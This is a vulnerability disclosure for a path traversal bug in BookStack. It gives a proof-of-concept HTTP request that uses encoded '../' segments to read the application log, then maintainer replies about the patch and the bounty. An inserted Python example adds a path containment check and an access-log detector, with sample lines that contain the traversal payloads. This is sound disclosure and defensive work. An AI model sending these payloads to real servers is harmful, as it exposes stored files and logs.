Path Traversal in bookstackapp/bookstack
Reported on
Oct 30th 2021
Description
While reading the recent BookStack source code (85dc8d), I discovered a path traversal vulnerability. An authenticated user can access all files stored in the storage directory.
Proof of Concept
GET /uploads/images/..%2f/..%2f/logs/laravel.log HTTP/1.1
Host: 172.17.0.1:8888
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: XSRF-TOKEN=eyJpdiI6IkY0TGptRjlIa29xXC9iSFZqaE91bzVnPT0iLCJ2YWx1ZSI6Im9nZVZSblYxQmt1QXE5Tk9wS0NHVnhraGUySWlrNjhEZGVyeWhoN0ZOdjcxc2ZzTUFIYlozTHVJVzFMZ3VMMjdROUhCUTFjY2s4MVl0MUIxNGU0eWlnT1ErQlpUNHBGQTBJOHErcjR3MW1USVlkbGxCN21INm5pSDZVbk1pQkVBIiwibWFjIjoiNjZkNTUzM2YzMDE2ZjQwZTBiZTM5MTQ5NDY4NjQ4NmE1YzlkOTBhMDIyZjIyNTI2YjYxNjdiMWVhY2ZiMThiZCJ9; bookstack_session=eyJpdiI6Ik1iSDluUVVNU2JMblh0YmJmSjhNSEE9PSIsInZhbHVlIjoiS04wWk5DaEthMVVxUVFuMlwvNGdqVHpHRE95bFk1VjNJTzRvZTZQeVV1blZ3SUhFQ21ySTF1eFRWUWFtZlBiTEdTVzlCWlFxOGdUVEl4RmN1aDhIcUNzXC9tamFKQk1hVStuS2o3RUlUczJQRlo2OGp6NGs2OHU3Q1FGMjZJVlpLUSIsIm1hYyI6ImM3NmY2YWQ0MjdlYTU5OGEyMmQxNWI1NDMyMTQwMzE3NWMzODhiNmFiZDJhN2VmODA1YzExOTVjMWY1MTZmNTIifQ%3D%3D
Upgrade-Insecure-Requests: 1
Impact
Read log files whose paths are predictable.
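The request above works because the file-serving route joins the encoded path onto its storage root without checking where the normalised result ends up. The following is an added example, not BookStack's own code: a containment check for such a route, plus a detector that flags the same encoded traversal in web-server access logs. The directory layout (a serving root under a storage directory with the application log in a sibling directory), the route prefix and all function names are assumptions for the illustration; the sample log lines are constructed, with the first one mirroring the request in the report.

```python
import posixpath
from typing import List, Optional
from urllib.parse import unquote

# Assumed layout: files are served from STORAGE_UPLOADS, and the application
# log lives in a sibling directory (storage/logs) that must stay unreachable.
STORAGE_UPLOADS = "/srv/app/storage/uploads"   # assumed serving root
URL_PREFIX = "/uploads/"                        # assumed route prefix


def fully_decode(text: str, max_rounds: int = 3) -> str:
    """Percent-decode until the value stops changing.

    One unquote() turns '..%2f' into '../' but leaves a double-encoded
    '..%252f' as '..%2f'; repeating the decode catches that variant too.
    """
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            return decoded
        text = decoded
    return text


def resolve_upload_path(url_path: str, base: str = STORAGE_UPLOADS) -> Optional[str]:
    """Map a request path onto a file under `base`, or return None.

    The decision is made on the normalised absolute path, not on whether the
    raw input contains '..', so encoding tricks do not change the outcome.
    """
    if not url_path.startswith(URL_PREFIX):
        return None
    relative = fully_decode(url_path[len(URL_PREFIX):])
    if "\x00" in relative or relative.startswith("/"):
        return None                      # NUL byte or absolute path
    candidate = posixpath.normpath(posixpath.join(base, relative))
    if candidate != base and not candidate.startswith(base + "/"):
        return None                      # escaped the serving root
    return candidate


def suspicious_segments(url_path: str) -> bool:
    """Detection side: True when any fully decoded path segment is '..'."""
    decoded = fully_decode(url_path)
    return any(seg == ".." for seg in decoded.replace("\\", "/").split("/"))


def flag_access_log(lines: List[str]) -> List[str]:
    """Return the access-log lines whose request target contains traversal."""
    flagged = []
    for line in lines:
        parts = line.split('"')
        if len(parts) < 2:
            continue
        request = parts[1]               # e.g. 'GET /uploads/... HTTP/1.1'
        fields = request.split()
        if len(fields) >= 2 and suspicious_segments(fields[1]):
            flagged.append(line)
    return flagged


# Constructed sample lines (not real traffic); the first mirrors the report.
SAMPLE_LOG = [
    '10.0.0.5 - - [30/Oct/2021:10:00:00 +0000] "GET /uploads/images/..%2f/..%2f/logs/laravel.log HTTP/1.1" 200 5120',
    '10.0.0.6 - - [30/Oct/2021:10:00:01 +0000] "GET /uploads/images/gallery/2021-10/diagram.png HTTP/1.1" 200 8341',
    '10.0.0.7 - - [30/Oct/2021:10:00:02 +0000] "GET /uploads/images/..%252f..%252flogs%252flaravel.log HTTP/1.1" 404 0',
]


if __name__ == "__main__":
    for url in ("/uploads/images/..%2f/..%2f/logs/laravel.log",
                "/uploads/images/gallery/2021-10/diagram.png"):
        print(url, "->", resolve_upload_path(url))
    for line in flag_access_log(SAMPLE_LOG):
        print("traversal attempt:", line)
```

The containment check deliberately allows `..` that stays inside the root (`images/a/../b.png` resolves to `images/b.png`) and only rejects paths whose normalised form leaves it; a check that merely searches the raw URL for `..` would miss the double-encoded form and reject harmless relative references. On the detection side, the same decode-then-inspect order is what makes the third sample line visible.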
Occurrences
Thank you so much again @theworstcomrade. Have verified on my own instance. Looks like there is some level of webserver protection that prevents this going too far up, which is something, but still far from ideal.
I'm especially annoyed at myself for having this vulnerability. Think I need to do a review through all image and attachment systems, as many of these were written before I'd been exposed to, and learnt from, a wide range of attack vectors.
Will mark this as valid and work it into a patch to be deployed with the other fix.
Since you won't be paid due to the depleted bucket, is there a way I can send you £40 myself? I really appreciate your efforts of discovering and reporting this.
@ssdmanbrown This patch looks good, I am no longer able to repeat the vulnerability. Thank you also for the bounty.